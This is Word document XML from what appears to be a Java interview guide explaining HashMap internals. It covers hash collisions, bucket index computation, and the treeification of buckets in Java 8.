      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="1069E4A5" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48BC37FA" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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peration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77BC5DDD" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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9F342F" w:rsidRPr="00CE4B95" w14:paraId="7E11EB39" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49753D12" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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hCode()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31B4BF0C" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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enerates hash for key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="3588B03B" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1079EEEF" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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dex = (n - 1) &amp; hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30CFF8CD" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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nds correct bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="4B63CF2E" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57DDA684" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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quals()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4A030C" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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sures key uniqueness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="15CA6027" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F10003C" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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llision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E5E68C" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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solved via Linked List or Tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="2DA35A34" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FD78319" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59CD2222" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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oubles capacity and rehashes entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E2088C" w14:textId="0589FEEF" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E37BA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C640E6B">
          <v:rect id="_x0000_i1517" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A612A6E" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc196307647"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is hash collision in HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w14:paraId="7CA5B2B2" w14:textId="0635B952" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00C47440" w:rsidP="002E4D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hash collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs in a HashMap when </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>two different keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> generate the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same hash value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and thus, map to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same bucket index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BCAF4" w14:textId="77777777" w:rsidR="00C47440" w:rsidRPr="00CE4B95" w:rsidRDefault="00C47440" w:rsidP="00C47440">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E07CA0" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00C3194C">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y do collisions happen?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19F240" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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hMap uses hashCode() to determine the bucket index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F6ECA" w14:textId="2946AB8E" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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ifferent keys can return the same hashCode() or map to the same index after applying the hashing formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760782F" w14:textId="3CECEB78" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C"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88967665"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">index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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C44D37" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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ce the number of possible keys is much greater than the number of buckets (array length), collisions are inevitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D2FFF6" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F2707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4D387E">
          <v:rect id="_x0000_i1518" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B2570F" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F27077">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3D03AB87" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C"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45951304"/>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key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F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hashCode = 2236</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D83F32" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C"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45951304"/>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key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E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hashCode = 2236</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD4340" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C"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45951304"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190998D0" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C"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45951304"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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p>
    <w:p w14:paraId="20381DA2" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C"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45951304"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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F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Facebook"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B6C1A" w14:textId="0C5DF585" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C"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45951304"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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E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Electronic Arts"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101B67A" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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ven though key1 and key2 are different, they may end up in the same bucket due to hash collision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C24F84" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F2707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57D0EE5">
          <v:rect id="_x0000_i1519" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E717C0E" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F27077">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lastRenderedPageBreak/>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> How HashMap handles collisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B0FDA7" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F2707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Java 7 and earlier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFFBDF8" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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llisions are handled using a linked list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027A5D0" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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ew entry is added to the head or tail of the list at that index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C110AC8" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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quals() is used to differentiate between keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D77BE9" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F2707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Java 8+:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B99128" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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number of entries in a bucket exceeds 8, and capacity &gt; 64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F027A82" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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linked list is converted into a Red-Black Tree to improve performance (O(log n) instead of O(n)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2291F0" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F2707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B127DB">
          <v:rect id="_x0000_i1520" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72456D51" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F27077">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Visual Representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F49D7D" w14:textId="78FC33A8" w:rsidR="00DB28F8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB28F8"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45626218"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Index</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Nod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ke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alue</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Faceboo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Nod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key</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E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alue</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Electron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ts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552B1F6" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F2707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C52CD08">
          <v:rect id="_x0000_i1521" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00821751" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F27077">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2"/>
        <w:gridCol w:w="5330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="05407BA1" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19C5361A" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F2707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erm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DB93559" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F2707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Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="6356BAB0" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D374A8" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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h Collision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C2F081A" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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wo keys map to the same bucket index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="797C8052" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1144EBD9" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C18AB9E" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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ame hashCode() or same computed index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="72EC9C30" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3853C546" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00C3CF19" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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nked List (Java 7), Tree (Java 8+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="047B9215" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A30E0C9" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F270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oblem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="402C746F" w14:textId="77777777" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00C3194C" w:rsidP="00F2707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degrade performance to O(n) if not handled efficiently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68132AEA" w14:textId="43A49F39" w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C47440">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>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8A2ABC5">
          <v:rect id="_x0000_i1522" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1432761B" w14:textId="77777777" w:rsidR="00C611E7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C611E7" w:rsidP="00C611E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc196307648"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How HashMap calls hashCode and equals method internally?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w14:paraId="229BB3CC" w14:textId="0BF24840" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">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a </w:t>
      </w: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the hashCode() and equals() methods are used internally to organize and retrieve the data efficiently.</w:t>
      </w:r>
    </w:p>
